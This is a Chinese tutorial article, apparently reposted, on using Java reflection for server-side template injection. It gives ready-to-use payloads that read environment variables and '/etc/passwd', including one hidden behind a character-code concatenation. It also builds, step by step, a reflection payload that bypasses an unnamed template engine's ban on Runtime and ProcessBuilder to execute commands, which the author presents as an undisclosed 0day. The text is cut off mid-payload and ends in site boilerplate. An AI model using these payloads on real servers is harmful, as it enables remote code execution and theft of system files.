本文主要是介绍从安全角度谈Java反射机制--终章,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
前言
首发:https://www.sec-in.com/article/309
通过前两章的了解,大家对Java反射机制有了一定的认知。本章作为反射篇的最终章,如果从反序列化的层面来说Java反射的具体危害,需要一些反序列化的基础知识。故笔者决定从反射机制本身来说,它的一个经常被使用的点—Server-Side Template Injection(简称SSTI),中文名服务器端模板注入。
SSTI
模板引擎被广泛应用于Web应用程序中,通过网页和电子邮件呈现动态数据。将用户输入内容不安全嵌入到模板中,实现服务器端模板注入。SSTI极其容易被误认为是跨站点脚本(XSS),大多数人经常与之擦肩而过。与XSS不同的是,模板注入可以用于直接攻击Web服务器内部,并经常获得远程代码执行(RCE)。模板注入可以通过开发人员的错误配置,通过故意暴露模板,开发人员试图通过来其提供丰富的功能,就像维基、博客、营销应用和内容管理等系统。
先看通用的Java SSTI的payload,payload中的T通常是需要声明的变量,每一个模板引擎都不同。在这里,我们不能发现已经可以看到反射的“影子”了,下面会从每一个模板来具体分析介绍任何使用反射从SSTI到RCE。
- 获取系统环境变量
${T(java.lang.System).getenv()}
- 读取文件内容
- ${T(java.lang.Runtime).getRuntime().exec(‘cat etc/passwd’)}
- ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
Template
前言
这里模板引擎是国内的模板引擎,漏洞还未必收录,故暂不公布,这里只做学习研究。如果你无意中接触过这个模板,如果你认出了这个模板,那么恭喜你获得0day一枚。笔者有一个请求如果你认出了,就不要公布了,0day你自己知道就好了。此款模板引擎禁止使用了java.lang.Runtime和java.lang.ProcessBuilder类的使用,使用Java的反射机制完美的bypass。
payload构造
${@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",
@java.lang.Class.forName("java.lang.String")).invoke(
@java.lang.Class.forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null),"calc")}
- 我们且看第一行,按照上面给出简单案例方法,我们应该这样子就可以了
@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",String.class).invoke(newInstance(),"calc") - 但是直接String.class直接写模板是找不到的,所以我们得继续构造payload,将String.class转化
@java.lang.Class.forName("java.lang.String")的形式,然后payload就变成下面这样子了。@java.lang.Class.forName("java.lang.Runtime").getMethod("exec",@java.lang.Class.forName("java.lang.String")).invoke(newInstance(),"calc") - 照道理上面就可以直接使用了,但是呢Runtime类没有无参构造方法,因此不能使用newInstance()方法来实例化。只能通过调用getRuntime()方法来进行实例化。所以newInstance()得替换成
@java.lang.Class.forName("java.lang.Runtime").getMethod("getRuntime",null)最终payload就变成了下面这样子。
${@java.lang.Class.forName<这篇关于从安全角度谈Java反射机制--终章的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
